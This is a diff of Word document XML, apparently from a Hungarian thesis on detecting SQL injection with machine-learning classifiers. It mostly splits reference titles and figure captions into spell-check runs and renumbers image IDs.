+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQLi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18892,13 +21477,77 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Beginner Guide to SQL Injection Boolean Based (Part 2)</w:t>
+        <w:t>Beginner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Guide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection Boolean </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Part 2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18954,7 +21603,61 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Time Based Blind SQL Injection (SQLi)</w:t>
+        <w:t xml:space="preserve">Time </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQLi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19004,14 +21707,106 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor</w:t>
-      </w:r>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Out-of-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> testing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>added</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AcuMonitor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19066,8 +21861,54 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Mike Shema 2012. SQL Injection &amp; Data Store Manipulation</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Mike </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Shema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2012. SQL Injection &amp; Data </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Store</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Manipulation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19122,8 +21963,54 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Prevention</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Cheat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Sheet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19178,8 +22065,36 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Alex Kaechele 2018. Classification</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Alex </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Kaechele</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2018. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Classification</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19527,7 +22442,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20" cstate="print">
+                    <a:blip r:embed="rId18" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19572,7 +22487,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a Logistic Regression </w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19619,7 +22562,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21" cstate="print">
+                    <a:blip r:embed="rId19" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19664,8 +22607,30 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Nearest Neighbors</w:t>
-      </w:r>
+        <w:t>K-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Nearest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Neighbors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19717,7 +22682,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22" cstate="print">
+                    <a:blip r:embed="rId20" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19762,7 +22727,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a Linear Support Vector </w:t>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Support</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19771,11 +22778,343 @@
         <w:t>TODO</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:sectPr>
+          <w:headerReference w:type="default" r:id="rId21"/>
+          <w:footerReference w:type="default" r:id="rId22"/>
+          <w:headerReference w:type="first" r:id="rId23"/>
+          <w:pgSz w:w="11906" w:h="16838"/>
+          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
+          <w:cols w:space="708"/>
+          <w:titlePg/>
+          <w:docGrid w:linePitch="360"/>
+        </w:sectPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F30B83E" wp14:editId="4DB24774">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>4103370</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1511300</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="377825" cy="219075"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="11" name="Szövegdoboz 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="377825" cy="219075"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln w="9525">
+                          <a:noFill/>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:sz w:val="14"/>
+                                <w:szCs w:val="14"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:sz w:val="14"/>
+                                <w:szCs w:val="14"/>
+                              </w:rPr>
+                              <w:t>…</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="2F30B83E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Szövegdoboz 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:323.1pt;margin-top:119pt;width:29.75pt;height:17.25pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:sz w:val="14"/>
+                          <w:szCs w:val="14"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:sz w:val="14"/>
+                          <w:szCs w:val="14"/>
+                        </w:rPr>
+                        <w:t>…</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EF013A1" wp14:editId="3A75825B">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>2795270</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>1416050</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="377825" cy="219075"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="217" name="Szövegdoboz 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="377825" cy="219075"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln w="9525">
+                          <a:noFill/>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:sz w:val="14"/>
+                                <w:szCs w:val="14"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:sz w:val="14"/>
+                                <w:szCs w:val="14"/>
+                              </w:rPr>
+                              <w:t>…</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="3EF013A1" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:220.1pt;margin-top:111.5pt;width:29.75pt;height:17.25pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:sz w:val="14"/>
+                          <w:szCs w:val="14"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:sz w:val="14"/>
+                          <w:szCs w:val="14"/>
+                        </w:rPr>
+                        <w:t>…</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28834D53" wp14:editId="224264A5">
+            <wp:extent cx="8891270" cy="2169160"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
+            <wp:docPr id="5" name="Kép 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="5" name="Kép 5"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="8891270" cy="2169160"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
